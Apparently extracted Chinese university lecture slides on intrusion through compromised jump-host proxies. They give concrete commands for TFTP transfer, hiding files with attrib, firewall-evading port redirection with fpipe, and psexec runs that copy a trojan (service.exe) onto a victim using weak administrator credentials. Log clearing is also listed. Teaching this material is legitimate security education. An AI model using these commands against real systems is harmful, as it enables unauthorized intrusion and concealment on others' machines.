19实例-入侵代理-跳板

1,跳板,曹天杰tjcao中国矿业大学计算机科学与技术学院,2,定义,基于代理的远程攻击。跳板又称为“入侵代理”或“入侵型肉鸡”,入侵者,跳板1,跳板2,远程主机/服务器,3,利用跳板攻击的步骤,文件传输文件隐藏利用远程代理扫描利用远程代理攻击清除入侵工具清除日志,4,文件传输,IPC$文件传输命令行方式copy、xcopy映射硬盘方式运行FTP、TFTP、HTTP服务器或木马方式传输打包传输,5,HTTP服务器hfs,hfs-httpfileserver,6,FTP服务器slimftp,adminftp.exe配置端(设置帐号)添加一个用户，点一下new，输入一个用户名a，再选中这个用户，输入一个密码bslimftp.exe服务端ftp.reg开机自动启动的注册表导入(请自行修改对应路径)用ie，ftp:/a:b28:21/,7,TFTP服务器tftpd32,服务器主界面,8,TFTP服务器tftpd32,TFTP客户端,tftp-iHostget|putSourceDestination,9,文件隐藏,使用attrib+h+s为文件添加隐藏、系统属性利用专用文件夹隐藏文件拷贝文件到c:winnttasks文件夹中自建专用文件夹,10,远程代理扫描,上传扫描器到肉鸡Nc或telnet登录肉鸡执行扫描下载扫描结果,11,本地telnet28一级跳板telnet32二级跳板在32上，netstat-a,入侵者,跳板1,跳板2,远程主机/服务器,.1,.128,.132,12,本地上,13,流光sensor,集成在流光扫描器中的工具，用来管理、制作扫描型肉鸡思路：加nt弱口令主机到流光sensor，利用肉鸡扫描，获取扫描结果,14,加nt弱口令主机到流光sensor,扫描IPC$弱口令安装sensor,15,管理肉鸡,添加删除检测状态,16,利用肉鸡扫描,探测-高级扫描工具，确定-选择流光主机,17,获取扫描结果,模式1，扫描细节回显到本地模式2，发送附件到邮箱，或者手动获取文件缺点：流光sensor只能做一级代理,18,利用远程代理入侵,上传入侵工具,19,端口重定向,工具fpipe是tcp转向连接工具，可突破防火墙控制例如Fpipel80s81r8211本地打开80端口监听，当监听到有连接请求时，立即转到本机81号端口，连接IP地址为11主机的82号端口,20,入侵步骤,上传fpipe到FPipe肉鸡本地使用psexec获得FPipe肉鸡的命令行，实现端口重定向。fpipel1000s1564r2332本地telnet281000实现与肉鸡跳板的telnet连接,入侵者,FPipe肉鸡,肉鸡跳板,远程主机/服务器,32,28,21,远程命令执行psexec,psexec是PsTools中提供的一个非常优秀的用于远程执行指令的软件，它可以直接在本机上操作即可在远程主机上执行命令使用方法：psexec肉鸡ip-u肉机用户名-p肉鸡密码要执行的命令参数-c拷贝本地文件到远程主机系统目录并执行-f同上，但是如果远程主机上已经存在该文件，则覆盖-d结束psexec进程,22,远程命令执行psexec,psexec28-uadministrator-p123cmd.exe和telnet登录后获得的shell是一样的psexec28-uadministrator-p123-d-cc:service.exe这里是把C盘根目录下的木马程序service.exe拷贝到肉鸡上的系统目录(也就是%systemroot%目录)去执行，完毕后结束psexec.exe进程。